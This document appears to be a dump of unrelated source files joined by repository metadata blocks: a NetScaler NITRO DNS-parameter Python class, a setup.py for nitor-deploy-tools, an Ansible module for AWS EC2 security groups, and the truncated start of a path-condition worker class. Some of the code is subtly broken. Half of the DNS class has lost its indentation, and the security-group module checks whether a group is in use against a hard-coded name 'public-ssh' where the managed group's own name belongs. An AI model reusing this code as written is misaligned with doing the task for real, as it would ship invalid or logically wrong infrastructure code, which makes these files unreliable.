from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class dnsparameter(base_resource) :
""" Configuration for DNS parameter resource. """
def __init__(self) :
self._retries = 0
self._minttl = 0
self._maxttl = 0
self._cacherecords = ""
self._namelookuppriority = ""
self._recursion = ""
self._resolutionorder = ""
self._dnssec = ""
self._maxpipeline = 0
self._dnsrootreferral = ""
self._dns64timeout = 0
@property
def retries(self) :
ur"""Maximum number of retry attempts when no response is received for a query sent to a name server. Applies to end resolver and forwarder configurations.<br/>Default value: 5<br/>Minimum length = 1<br/>Maximum length = 5.
"""
try :
return self._retries
except Exception as e:
raise e
@retries.setter
def retries(self, retries) :
ur"""Maximum number of retry attempts when no response is received for a query sent to a name server. Applies to end resolver and forwarder configurations.<br/>Default value: 5<br/>Minimum length = 1<br/>Maximum length = 5
"""
try :
self._retries = retries
except Exception as e:
raise e
@property
def minttl(self) :
ur"""Minimum permissible time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is lower than the value configured for minTTL, the TTL of the record is set to the value of minTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Maximum length = 604800.
"""
try :
return self._minttl
except Exception as e:
raise e
@minttl.setter
def minttl(self, minttl) :
ur"""Minimum permissible time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is lower than the value configured for minTTL, the TTL of the record is set to the value of minTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Maximum length = 604800
"""
try :
self._minttl = minttl
except Exception as e:
raise e
@property
def maxttl(self) :
ur"""Maximum time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is higher than the value configured for maxTTL, the TTL of the record is set to the value of maxTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Default value: 604800<br/>Minimum length = 1<br/>Maximum length = 604800.
"""
try :
return self._maxttl
except Exception as e:
raise e
@maxttl.setter
def maxttl(self, maxttl) :
ur"""Maximum time to live (TTL) for all records cached in the DNS cache by DNS proxy, end resolver, and forwarder configurations. If the TTL of a record that is to be cached is higher than the value configured for maxTTL, the TTL of the record is set to the value of maxTTL before caching. When you modify this setting, the new value is applied only to those records that are cached after the modification. The TTL values of existing records are not changed.<br/>Default value: 604800<br/>Minimum length = 1<br/>Maximum length = 604800
"""
try :
self._maxttl = maxttl
except Exception as e:
raise e
@property
def cacherecords(self) :
ur"""Cache resource records in the DNS cache. Applies to resource records obtained through proxy configurations only. End resolver and forwarder configurations always cache records in the DNS cache, and you cannot disable this behavior. When you disable record caching, the appliance stops caching server responses. However, cached records are not flushed. The appliance does not serve requests from the cache until record caching is enabled again.<br/>Default value: YES<br/>Possible values = YES, NO.
"""
try :
return self._cacherecords
except Exception as e:
raise e
@cacherecords.setter
def cacherecords(self, cacherecords) :
ur"""Cache resource records in the DNS cache. Applies to resource records obtained through proxy configurations only. End resolver and forwarder configurations always cache records in the DNS cache, and you cannot disable this behavior. When you disable record caching, the appliance stops caching server responses. However, cached records are not flushed. The appliance does not serve requests from the cache until record caching is enabled again.<br/>Default value: YES<br/>Possible values = YES, NO
"""
try :
self._cacherecords = cacherecords
except Exception as e:
raise e
@property
def namelookuppriority(self) :
ur"""Type of lookup (DNS or WINS) to attempt first. If the first-priority lookup fails, the second-priority lookup is attempted. Used only by the SSL VPN feature.<br/>Default value: WINS<br/>Possible values = WINS, DNS.
"""
try :
return self._namelookuppriority
except Exception as e:
raise e
@namelookuppriority.setter
def namelookuppriority(self, namelookuppriority) :
ur"""Type of lookup (DNS or WINS) to attempt first. If the first-priority lookup fails, the second-priority lookup is attempted. Used only by the SSL VPN feature.<br/>Default value: WINS<br/>Possible values = WINS, DNS
"""
try :
self._namelookuppriority = namelookuppriority
except Exception as e:
raise e
@property
def recursion(self) :
ur"""Function as an end resolver and recursively resolve queries for domains that are not hosted on the NetScaler appliance. Also resolve queries recursively when the external name servers configured on the appliance (for a forwarder configuration) are unavailable. When external name servers are unavailable, the appliance queries a root server and resolves the request recursively, as it does for an end resolver configuration.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._recursion
except Exception as e:
raise e
@recursion.setter
def recursion(self, recursion) :
ur"""Function as an end resolver and recursively resolve queries for domains that are not hosted on the NetScaler appliance. Also resolve queries recursively when the external name servers configured on the appliance (for a forwarder configuration) are unavailable. When external name servers are unavailable, the appliance queries a root server and resolves the request recursively, as it does for an end resolver configuration.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._recursion = recursion
except Exception as e:
raise e
@property
def resolutionorder(self) :
ur"""Type of DNS queries (A, AAAA, or both) to generate during the routine functioning of certain NetScaler features, such as SSL VPN, cache redirection, and the integrated cache. The queries are sent to the external name servers that are configured for the forwarder function. If you specify both query types, you can also specify the order. Available settings function as follows:
* OnlyAQuery. Send queries for IPv4 address records (A records) only.
* OnlyAAAAQuery. Send queries for IPv6 address records (AAAA records) instead of queries for IPv4 address records (A records).
* AThenAAAAQuery. Send a query for an A record, and then send a query for an AAAA record if the query for the A record results in a NODATA response from the name server.
* AAAAThenAQuery. Send a query for an AAAA record, and then send a query for an A record if the query for the AAAA record results in a NODATA response from the name server.<br/>Default value: OnlyAQuery<br/>Possible values = OnlyAQuery, OnlyAAAAQuery, AThenAAAAQuery, AAAAThenAQuery.
"""
try :
return self._resolutionorder
except Exception as e:
raise e
@resolutionorder.setter
def resolutionorder(self, resolutionorder) :
ur"""Type of DNS queries (A, AAAA, or both) to generate during the routine functioning of certain NetScaler features, such as SSL VPN, cache redirection, and the integrated cache. The queries are sent to the external name servers that are configured for the forwarder function. If you specify both query types, you can also specify the order. Available settings function as follows:
* OnlyAQuery. Send queries for IPv4 address records (A records) only.
* OnlyAAAAQuery. Send queries for IPv6 address records (AAAA records) instead of queries for IPv4 address records (A records).
* AThenAAAAQuery. Send a query for an A record, and then send a query for an AAAA record if the query for the A record results in a NODATA response from the name server.
* AAAAThenAQuery. Send a query for an AAAA record, and then send a query for an A record if the query for the AAAA record results in a NODATA response from the name server.<br/>Default value: OnlyAQuery<br/>Possible values = OnlyAQuery, OnlyAAAAQuery, AThenAAAAQuery, AAAAThenAQuery
"""
try :
self._resolutionorder = resolutionorder
except Exception as e:
raise e
	# dnssec: ENABLED/DISABLED toggle (see the nested Dnssec constants class).
	@property
	def dnssec(self) :
		ur"""Enable or disable the Domain Name System Security Extensions (DNSSEC) feature on the appliance. Note: Even when the DNSSEC feature is enabled, forwarder configurations (used by internal NetScaler features such as SSL VPN and Cache Redirection for name resolution) do not support the DNSSEC OK (DO) bit in the EDNS0 OPT header.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
		"""
		try :
			return self._dnssec
		except Exception as e:
			raise e
	@dnssec.setter
	def dnssec(self, dnssec) :
		ur"""Set the DNSSEC toggle; see the dnssec getter for the full description.
		"""
		# Stored verbatim; no client-side validation.
		try :
			self._dnssec = dnssec
		except Exception as e:
			raise e
	# maxpipeline: concurrent-DNS-request cap per client connection (0 = unlimited).
	@property
	def maxpipeline(self) :
		ur"""Maximum number of concurrent DNS requests to allow on a single client connection, which is identified by the <clientip:port>-<vserver ip:port> tuple. A value of 0 (zero) applies no limit to the number of concurrent DNS requests allowed on a single client connection.
		"""
		try :
			return self._maxpipeline
		except Exception as e:
			raise e
	@maxpipeline.setter
	def maxpipeline(self, maxpipeline) :
		ur"""Set the per-connection concurrent request cap; see the maxpipeline getter.
		"""
		# Stored verbatim; no client-side validation.
		try :
			self._maxpipeline = maxpipeline
		except Exception as e:
			raise e
	# dnsrootreferral: ENABLED/DISABLED (see the nested Dnsrootreferral class).
	@property
	def dnsrootreferral(self) :
		ur"""Send a root referral if a client queries a domain name that is unrelated to the domains configured/cached on the NetScaler appliance. If the setting is disabled, the appliance sends a blank response instead of a root referral. Applicable to domains for which the appliance is authoritative. Disable the parameter when the appliance is under attack from a client that is sending a flood of queries for unrelated domains.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
		"""
		try :
			return self._dnsrootreferral
		except Exception as e:
			raise e
	@dnsrootreferral.setter
	def dnsrootreferral(self, dnsrootreferral) :
		ur"""Set the root-referral toggle; see the dnsrootreferral getter.
		"""
		# Stored verbatim; no client-side validation.
		try :
			self._dnsrootreferral = dnsrootreferral
		except Exception as e:
			raise e
	# dns64timeout: wait (per docstring, max 10000) before falling back to an A
	# query during DNS64 resolution.
	@property
	def dns64timeout(self) :
		ur"""While doing DNS64 resolution, this parameter specifies the time to wait before sending an A query if no response is received from backend DNS server for AAAA query.<br/>Maximum length = 10000.
		"""
		try :
			return self._dns64timeout
		except Exception as e:
			raise e
	@dns64timeout.setter
	def dns64timeout(self, dns64timeout) :
		ur"""Set the DNS64 fallback timeout; see the dns64timeout getter.
		"""
		# Stored verbatim; no client-side validation.
		try :
			self._dns64timeout = dns64timeout
		except Exception as e:
			raise e
	def _get_nitro_response(self, service, response) :
		ur""" converts nitro response into object and returns the object array in case of get request.
		"""
		try :
			# Deserialize the raw NITRO payload into a dnsparameter_response wrapper.
			result = service.payload_formatter.string_to_resource(dnsparameter_response, response, self.__class__.__name__)
			if(result.errorcode != 0) :
				# errorcode 444 -> invalidate the client's cached session so the
				# next call re-authenticates (see clear_session).
				if (result.errorcode == 444) :
					service.clear_session(self)
				if result.severity :
					# Only severity "ERROR" is fatal; other severities fall
					# through and the payload below is still returned.
					if (result.severity == "ERROR") :
						raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
				else :
					# No severity reported: treat any non-zero errorcode as fatal.
					raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
			return result.dnsparameter
		except Exception as e :
			raise e
	def _get_object_name(self) :
		ur""" Returns the value of object identifier argument
		"""
		# This resource exposes no per-instance identifier; 0 is returned
		# unconditionally.
		try :
			return 0
		except Exception as e :
			raise e
	@classmethod
	def update(cls, client, resource) :
		ur""" Use this API to update dnsparameter.

		client   -- nitro_service session used to issue the request.
		resource -- dnsparameter object carrying the attribute values to apply.
		"""
		try :
			# NOTE(review): only a single resource is handled; passing a list
			# falls through and returns None.
			if type(resource) is not list :
				# Copy each updatable attribute onto a fresh request object so
				# unrelated state on 'resource' is not serialized.
				updateresource = dnsparameter()
				updateresource.retries = resource.retries
				updateresource.minttl = resource.minttl
				updateresource.maxttl = resource.maxttl
				updateresource.cacherecords = resource.cacherecords
				updateresource.namelookuppriority = resource.namelookuppriority
				updateresource.recursion = resource.recursion
				updateresource.resolutionorder = resource.resolutionorder
				updateresource.dnssec = resource.dnssec
				updateresource.maxpipeline = resource.maxpipeline
				updateresource.dnsrootreferral = resource.dnsrootreferral
				updateresource.dns64timeout = resource.dns64timeout
				return updateresource.update_resource(client)
		except Exception as e :
			raise e
	@classmethod
	def unset(cls, client, resource, args) :
		ur""" Use this API to unset the properties of dnsparameter resource.
		Properties that need to be unset are specified in args array.

		client -- nitro_service session used to issue the request.
		args   -- iterable of property names to reset to their defaults.
		"""
		try :
			# NOTE(review): 'resource' is otherwise unused; a list argument
			# falls through and returns None.
			if type(resource) is not list :
				unsetresource = dnsparameter()
				return unsetresource.unset_resource(client, args)
		except Exception as e :
			raise e
	@classmethod
	def get(cls, client, name="", option_="") :
		ur""" Use this API to fetch all the dnsparameter resources that are configured on netscaler.
		"""
		try :
			# NOTE(review): 'name' is only tested for truthiness -- passing a
			# non-empty name skips the fetch and returns None.
			if not name :
				obj = dnsparameter()
				response = obj.get_resources(client, option_)
			return response
		except Exception as e :
			raise e
	# The nested classes below enumerate the legal string constants for the
	# corresponding dnsparameter attributes (mirroring the "Possible values"
	# noted in the accessor docstrings).
	class Cacherecords:
		YES = "YES"
		NO = "NO"
	class Recursion:
		ENABLED = "ENABLED"
		DISABLED = "DISABLED"
	class Resolutionorder:
		OnlyAQuery = "OnlyAQuery"
		OnlyAAAAQuery = "OnlyAAAAQuery"
		AThenAAAAQuery = "AThenAAAAQuery"
		AAAAThenAQuery = "AAAAThenAQuery"
	class Namelookuppriority:
		WINS = "WINS"
		DNS = "DNS"
	class Dnsrootreferral:
		ENABLED = "ENABLED"
		DISABLED = "DISABLED"
	class Dnssec:
		ENABLED = "ENABLED"
		DISABLED = "DISABLED"
class dnsparameter_response(base_response) :
	""" NITRO response wrapper for dnsparameter requests.

	Carries the standard NITRO status fields plus a pre-allocated list of
	dnsparameter payload objects for the payload formatter to populate.
	"""
	def __init__(self, length=1) :
		self.errorcode = 0
		self.message = ""
		self.severity = ""
		self.sessionid = ""
		# Pre-allocate 'length' empty resource objects; the earlier redundant
		# 'self.dnsparameter = []' dead store was removed.
		self.dnsparameter = [dnsparameter() for _ in range(length)]
| {
"content_hash": "def92478ddbc24bd6f97ffc1216985a3",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 540,
"avg_line_length": 49.07121661721068,
"alnum_prop": 0.7515268791195501,
"repo_name": "benfinke/ns_python",
"id": "1e3fde759248151802227ef0673d2e34fa5c24e5",
"size": "17151",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nssrc/com/citrix/netscaler/nitro/resource/config/dns/dnsparameter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "21836782"
},
{
"name": "Shell",
"bytes": "513"
}
],
"symlink_target": ""
} |
import sys
from setuptools import setup
from n_utils import PATH_COMMANDS, CONSOLESCRIPTS
# Packaging definition for nitor-deploy-tools.
# NOTE(review): 'version' and the tarball tag embedded in 'download_url' must be
# kept in sync on every release (both read 1.60 here).
setup(name='nitor_deploy_tools',
      version='1.60',
      description='Tools for deploying to AWS via CloudFormation and Serverless framework that support a pull request based workflow',
      url='http://github.com/NitorCreations/nitor-deploy-tools',
      download_url='https://github.com/NitorCreations/nitor-deploy-tools/tarball/1.60',
      author='Pasi Niemi',
      author_email='pasi@nitor.com',
      license='Apache 2.0',
      packages=['n_utils'],
      include_package_data=True,
      # PATH_COMMANDS / CONSOLESCRIPTS are defined in n_utils (imported above).
      scripts=PATH_COMMANDS,
      entry_points={
          'console_scripts': CONSOLESCRIPTS,
      },
      setup_requires=[
          'pytest-runner'
      ],
      install_requires=[
          'future',
          'pyaml',
          'boto3',
          'awscli',
          'requests',
          'termcolor',
          'ipaddr',
          'argcomplete',
          'nitor-vault',
          'psutil',
          'Pygments',
          'pyotp',
          'pyqrcode',
          'six',
          'python-dateutil',
          'pycryptodomex',
          'configparser',
          'scandir'
      ] + ([
          # Windows-only extras, appended when installing on win32.
          'win-unicode-console',
          'wmi',
          'pypiwin32'
      ] if sys.platform.startswith('win') else []),
      tests_require=[
          'pytest',
          'pytest-mock',
          'pytest-cov'
      ],
      zip_safe=False)
| {
"content_hash": "563bcc5c5a71f84c3db9914344caed2f",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 134,
"avg_line_length": 28.058823529411764,
"alnum_prop": 0.5359888190076869,
"repo_name": "NitorCreations/nitor-deploy-tools",
"id": "e2883223d46c720e558be5261db3bdbb900f933a",
"size": "2018",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7703"
},
{
"name": "Groovy",
"bytes": "34278"
},
{
"name": "JavaScript",
"bytes": "2617"
},
{
"name": "PowerShell",
"bytes": "1888"
},
{
"name": "Python",
"bytes": "281286"
},
{
"name": "Shell",
"bytes": "164345"
}
],
"symlink_target": ""
} |
DOCUMENTATION = '''
---
module: ec2_group
author: "Andrew de Quincey (@adq)"
version_added: "1.3"
short_description: maintain an ec2 VPC security group.
description:
- maintains ec2 security groups. This module has a dependency on python-boto >= 2.5
options:
name:
description:
- Name of the security group.
required: true
description:
description:
- Description of the security group.
required: true
vpc_id:
description:
- ID of the VPC to create the group in.
required: false
rules:
description:
- List of firewall inbound rules to enforce in this group (see example). If none are supplied, a default all-out rule is assumed. If an empty list is supplied, no inbound rules will be enabled.
required: false
rules_egress:
description:
- List of firewall outbound rules to enforce in this group (see example). If none are supplied, a default all-out rule is assumed. If an empty list is supplied, no outbound rules will be enabled.
required: false
version_added: "1.6"
state:
version_added: "1.4"
description:
- Create or delete a security group
required: false
default: 'present'
choices: [ "present", "absent" ]
aliases: []
purge_rules:
version_added: "1.8"
description:
- Purge existing rules on security group that are not found in rules
required: false
default: 'true'
aliases: []
purge_rules_egress:
version_added: "1.8"
description:
- Purge existing rules_egress on security group that are not found in rules_egress
required: false
default: 'true'
aliases: []
extends_documentation_fragment:
- aws
- ec2
notes:
- If a rule declares a group_name and that group doesn't exist, it will be
automatically created. In that case, group_desc should be provided as well.
The module will refuse to create a depended-on group without a description.
'''
EXAMPLES = '''
- name: example ec2 group
ec2_group:
name: example
description: an example EC2 group
vpc_id: 12345
region: eu-west-1a
aws_secret_key: SECRET
aws_access_key: ACCESS
rules:
- proto: tcp
from_port: 80
to_port: 80
cidr_ip: 0.0.0.0/0
- proto: tcp
from_port: 22
to_port: 22
cidr_ip: 10.0.0.0/8
- proto: tcp
from_port: 443
to_port: 443
group_id: amazon-elb/sg-87654321/amazon-elb-sg
- proto: tcp
from_port: 3306
to_port: 3306
group_id: 123412341234/sg-87654321/exact-name-of-sg
- proto: udp
from_port: 10050
to_port: 10050
cidr_ip: 10.0.0.0/8
- proto: udp
from_port: 10051
to_port: 10051
group_id: sg-12345678
- proto: icmp
from_port: 8 # icmp type, -1 = any type
to_port: -1 # icmp subtype, -1 = any subtype
cidr_ip: 10.0.0.0/8
- proto: all
# the containing group name may be specified here
group_name: example
rules_egress:
- proto: tcp
from_port: 80
to_port: 80
cidr_ip: 0.0.0.0/0
group_name: example-other
# description to use if example-other needs to be created
group_desc: other example EC2 group
'''
# boto is an optional dependency: its absence is recorded here and reported as
# a module failure from main() instead of crashing at import time.
try:
    import boto.ec2
    from boto.ec2.securitygroup import SecurityGroup
    HAS_BOTO = True
except ImportError:
    HAS_BOTO = False
def make_rule_key(prefix, rule, group_id, cidr_ip):
    """Build the unique lookup key "<prefix>-<proto>-<from>-<to>-<group>-<cidr>"
    for a single security-group rule.

    ``rule`` may be either a rule dict from the module arguments or a boto
    IPPermissions-like object; the relevant fields are read accordingly.
    The key is lower-cased, but literal ``None``/``'none'`` segments are
    normalised back to ``-None`` so dict-rule and boto-rule keys line up.
    """
    if isinstance(rule, dict):
        proto = rule.get('proto', None)
        from_port = rule.get('from_port', None)
        to_port = rule.get('to_port', None)
        # fix for 11177: an "all traffic" rule (-1/-1) normalises its ports
        if proto not in ('icmp', 'tcp', 'udp') and from_port == -1 and to_port == -1:
            from_port = to_port = 'none'
    else:
        # boto.ec2.securitygroup.IPPermissions object
        proto = getattr(rule, 'ip_protocol', None)
        from_port = getattr(rule, 'from_port', None)
        to_port = getattr(rule, 'to_port', None)

    raw = '-'.join(str(part) for part in (prefix, proto, from_port, to_port, group_id, cidr_ip))
    return raw.lower().replace('-none', '-None')
def addRulesToLookup(rules, prefix, dict):
    """Index every (rule, grant) pair from *rules* into *dict*, keyed by
    make_rule_key(); entries sharing a key are overwritten. The mapping is
    later used to spot rules that should be purged."""
    # NOTE(review): the third parameter shadows the builtin 'dict'; it is kept
    # as-is here to preserve the public signature.
    for rule in rules:
        for grant in rule.grants:
            dict[make_rule_key(prefix, rule, grant.group_id, grant.cidr_ip)] = (rule, grant)
def validate_rule(module, rule):
    """Fail the module if *rule* contains unknown or mutually-exclusive keys.

    At most one of cidr_ip / group_id / group_name may identify the rule's
    target; any key outside VALID_PARAMS is rejected outright.
    """
    VALID_PARAMS = ('cidr_ip',
                    'group_id', 'group_name', 'group_desc',
                    'proto', 'from_port', 'to_port')

    for param in rule:
        if param not in VALID_PARAMS:
            module.fail_json(msg='Invalid rule parameter \'{}\''.format(param))

    # The three target-selector keys are pairwise exclusive.
    target_keys = set(rule) & {'cidr_ip', 'group_id', 'group_name'}
    if {'group_id', 'cidr_ip'} <= target_keys:
        module.fail_json(msg='Specify group_id OR cidr_ip, not both')
    elif {'group_name', 'cidr_ip'} <= target_keys:
        module.fail_json(msg='Specify group_name OR cidr_ip, not both')
    elif {'group_id', 'group_name'} <= target_keys:
        module.fail_json(msg='Specify group_id OR group_name, not both')
def get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id):
    """
    Returns tuple of (group_id, ip, target_group_created) after validating
    rule params.

    rule: Dict describing a rule.
    name: Name of the security group being managed.
    groups: Dict of all available security groups.

    AWS accepts an ip range or a security group as target of a rule. This
    function validate the rule specification and return either a non-None
    group_id or a non-None ip range. target_group_created is True when a
    referenced group_name had to be created on the fly.
    """
    FOREIGN_SECURITY_GROUP_REGEX = '^(\S+)/(sg-\S+)/(\S+)'
    group_id = None
    group_name = None
    ip = None
    target_group_created = False
    # The mutual-exclusion checks below duplicate validate_rule() on purpose:
    # this function is also reachable with rules that bypassed validation.
    if 'group_id' in rule and 'cidr_ip' in rule:
        module.fail_json(msg="Specify group_id OR cidr_ip, not both")
    elif 'group_name' in rule and 'cidr_ip' in rule:
        module.fail_json(msg="Specify group_name OR cidr_ip, not both")
    elif 'group_id' in rule and 'group_name' in rule:
        module.fail_json(msg="Specify group_id OR group_name, not both")
    elif 'group_id' in rule and re.match(FOREIGN_SECURITY_GROUP_REGEX, rule['group_id']):
        # this is a foreign Security Group. Since you can't fetch it you must create an instance of it
        owner_id, group_id, group_name = re.match(FOREIGN_SECURITY_GROUP_REGEX, rule['group_id']).groups()
        group_instance = SecurityGroup(owner_id=owner_id, name=group_name, id=group_id)
        groups[group_id] = group_instance
        groups[group_name] = group_instance
    elif 'group_id' in rule:
        group_id = rule['group_id']
    elif 'group_name' in rule:
        group_name = rule['group_name']
        # A rule may reference the group being managed itself.
        if group_name == name:
            group_id = group.id
            groups[group_id] = group
            groups[group_name] = group
        elif group_name in groups:
            group_id = groups[group_name].id
        else:
            # Auto-create the referenced group -- refuse without a description.
            if not rule.get('group_desc', '').strip():
                module.fail_json(msg="group %s will be automatically created by rule %s and no description was provided" % (group_name, rule))
            if not module.check_mode:
                auto_group = ec2.create_security_group(group_name, rule['group_desc'], vpc_id=vpc_id)
                group_id = auto_group.id
                groups[group_id] = auto_group
                groups[group_name] = auto_group
            target_group_created = True
    elif 'cidr_ip' in rule:
        ip = rule['cidr_ip']
    return group_id, ip, target_group_created
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=True),
description=dict(type='str', required=True),
vpc_id=dict(type='str'),
rules=dict(type='list'),
rules_egress=dict(type='list'),
state = dict(default='present', type='str', choices=['present', 'absent']),
purge_rules=dict(default=True, required=False, type='bool'),
purge_rules_egress=dict(default=True, required=False, type='bool'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
name = module.params['name']
description = module.params['description']
vpc_id = module.params['vpc_id']
rules = module.params['rules']
rules_egress = module.params['rules_egress']
state = module.params.get('state')
purge_rules = module.params['purge_rules']
purge_rules_egress = module.params['purge_rules_egress']
changed = False
ec2 = ec2_connect(module)
# find the group if present
group = None
groups = {}
for curGroup in ec2.get_all_security_groups():
groups[curGroup.id] = curGroup
if curGroup.name in groups:
# Prioritise groups from the current VPC
if vpc_id is None or curGroup.vpc_id == vpc_id:
groups[curGroup.name] = curGroup
else:
groups[curGroup.name] = curGroup
if curGroup.name == name and (vpc_id is None or curGroup.vpc_id == vpc_id):
group = curGroup
# Ensure requested group is absent
if state == 'absent':
if group:
'''found a match, delete it'''
try:
group.delete()
except Exception, e:
module.fail_json(msg="Unable to delete security group '%s' - %s" % (group, e))
else:
group = None
changed = True
else:
'''no match found, no changes required'''
# Ensure requested group is present
elif state == 'present':
if group:
'''existing group found'''
# check the group parameters are correct
group_in_use = False
rs = ec2.get_all_instances()
for r in rs:
for i in r.instances:
group_in_use |= reduce(lambda x, y: x | (y.name == 'public-ssh'), i.groups, False)
if group.description != description:
if group_in_use:
module.fail_json(msg="Group description does not match, but it is in use so cannot be changed.")
# if the group doesn't exist, create it now
else:
'''no match found, create it'''
if not module.check_mode:
group = ec2.create_security_group(name, description, vpc_id=vpc_id)
# When a group is created, an egress_rule ALLOW ALL
# to 0.0.0.0/0 is added automatically but it's not
# reflected in the object returned by the AWS API
# call. We re-read the group for getting an updated object
# amazon sometimes takes a couple seconds to update the security group so wait till it exists
while len(ec2.get_all_security_groups(filters={ 'group_id': group.id, })) == 0:
time.sleep(0.1)
group = ec2.get_all_security_groups(group_ids=(group.id,))[0]
changed = True
else:
module.fail_json(msg="Unsupported state requested: %s" % state)
# create a lookup for all existing rules on the group
if group:
# Manage ingress rules
groupRules = {}
addRulesToLookup(group.rules, 'in', groupRules)
# Now, go through all provided rules and ensure they are there.
if rules is not None:
for rule in rules:
validate_rule(module, rule)
group_id, ip, target_group_created = get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id)
if target_group_created:
changed = True
if rule['proto'] in ('all', '-1', -1):
rule['proto'] = -1
rule['from_port'] = None
rule['to_port'] = None
# Convert ip to list we can iterate over
if not isinstance(ip, list):
ip = [ip]
# If rule already exists, don't later delete it
for thisip in ip:
ruleId = make_rule_key('in', rule, group_id, thisip)
if ruleId in groupRules:
del groupRules[ruleId]
# Otherwise, add new rule
else:
grantGroup = None
if group_id:
grantGroup = groups[group_id]
if not module.check_mode:
group.authorize(rule['proto'], rule['from_port'], rule['to_port'], thisip, grantGroup)
changed = True
# Finally, remove anything left in the groupRules -- these will be defunct rules
if purge_rules:
for (rule, grant) in groupRules.itervalues() :
grantGroup = None
if grant.group_id:
if grant.owner_id != group.owner_id:
# this is a foreign Security Group. Since you can't fetch it you must create an instance of it
group_instance = SecurityGroup(owner_id=grant.owner_id, name=grant.name, id=grant.group_id)
groups[grant.group_id] = group_instance
groups[grant.name] = group_instance
grantGroup = groups[grant.group_id]
if not module.check_mode:
group.revoke(rule.ip_protocol, rule.from_port, rule.to_port, grant.cidr_ip, grantGroup)
changed = True
# Manage egress rules
groupRules = {}
addRulesToLookup(group.rules_egress, 'out', groupRules)
# Now, go through all provided rules and ensure they are there.
if rules_egress is not None:
for rule in rules_egress:
validate_rule(module, rule)
group_id, ip, target_group_created = get_target_from_rule(module, ec2, rule, name, group, groups, vpc_id)
if target_group_created:
changed = True
if rule['proto'] in ('all', '-1', -1):
rule['proto'] = -1
rule['from_port'] = None
rule['to_port'] = None
# Convert ip to list we can iterate over
if not isinstance(ip, list):
ip = [ip]
# If rule already exists, don't later delete it
for thisip in ip:
ruleId = make_rule_key('out', rule, group_id, thisip)
if ruleId in groupRules:
del groupRules[ruleId]
# Otherwise, add new rule
else:
grantGroup = None
if group_id:
grantGroup = groups[group_id].id
if not module.check_mode:
ec2.authorize_security_group_egress(
group_id=group.id,
ip_protocol=rule['proto'],
from_port=rule['from_port'],
to_port=rule['to_port'],
src_group_id=grantGroup,
cidr_ip=thisip)
changed = True
elif vpc_id and not module.check_mode:
# when using a vpc, but no egress rules are specified,
# we add in a default allow all out rule, which was the
# default behavior before egress rules were added
default_egress_rule = 'out--1-None-None-None-0.0.0.0/0'
if default_egress_rule not in groupRules:
ec2.authorize_security_group_egress(
group_id=group.id,
ip_protocol=-1,
from_port=None,
to_port=None,
src_group_id=None,
cidr_ip='0.0.0.0/0'
)
changed = True
else:
# make sure the default egress rule is not removed
del groupRules[default_egress_rule]
# Finally, remove anything left in the groupRules -- these will be defunct rules
if purge_rules_egress:
for (rule, grant) in groupRules.itervalues():
grantGroup = None
if grant.group_id:
grantGroup = groups[grant.group_id].id
if not module.check_mode:
ec2.revoke_security_group_egress(
group_id=group.id,
ip_protocol=rule.ip_protocol,
from_port=rule.from_port,
to_port=rule.to_port,
src_group_id=grantGroup,
cidr_ip=grant.cidr_ip)
changed = True
if group:
module.exit_json(changed=changed, group_id=group.id)
else:
module.exit_json(changed=changed, group_id=None)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *

# Only run when executed as an Ansible module / script, not when imported
# (e.g. by documentation tooling or tests).
if __name__ == '__main__':
    main()
| {
"content_hash": "e8689c1a0c6e99563c86b8c9d779002a",
"timestamp": "",
"source": "github",
"line_count": 455,
"max_line_length": 201,
"avg_line_length": 37.96923076923077,
"alnum_prop": 0.557247047927761,
"repo_name": "daniel-rhoades/hippo-production-example",
"id": "6a696eacc6c93d9709aacb78a439e89ddff00a46",
"size": "17971",
"binary": false,
"copies": "19",
"ref": "refs/heads/master",
"path": "library/ec2_group.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43639"
},
{
"name": "Shell",
"bytes": "1774"
}
],
"symlink_target": ""
} |
from t_core.messages import Packet
from t_core.iterator import Iterator
import time
from multiprocessing import Process
from core.himesis_utils import expand_graph, shrink_graph, delete_graph, disjoint_model_union, print_graph, graph_to_dot, get_preds_and_succs
from copy import deepcopy
import numpy.random as nprnd
from profiler import *
from util.progress import ProgressBar
from PCDict import PCDict
#needed to use kernprof
class DummyProcess:
    """In-process stand-in for multiprocessing.Process so that run() executes
    in the current process (needed to use kernprof/line profiling)."""

    def start(self):
        # Execute synchronously instead of forking a child process.
        self.run()

    def join(self):
        # start() already ran to completion, so there is nothing to wait for.
        pass
class path_condition_generator_worker(Process):
    def __init__(self, layer_rules, rulesToTreat, rulesForSecondPhase, pruner, layer, num, report_progress, verbosity):
        """Worker that symbolically executes one layer's rules over a set of
        path conditions.

        layer_rules -- rules belonging to the layer this worker processes
        pruner      -- object exposing isPathConditionStillFeasible()
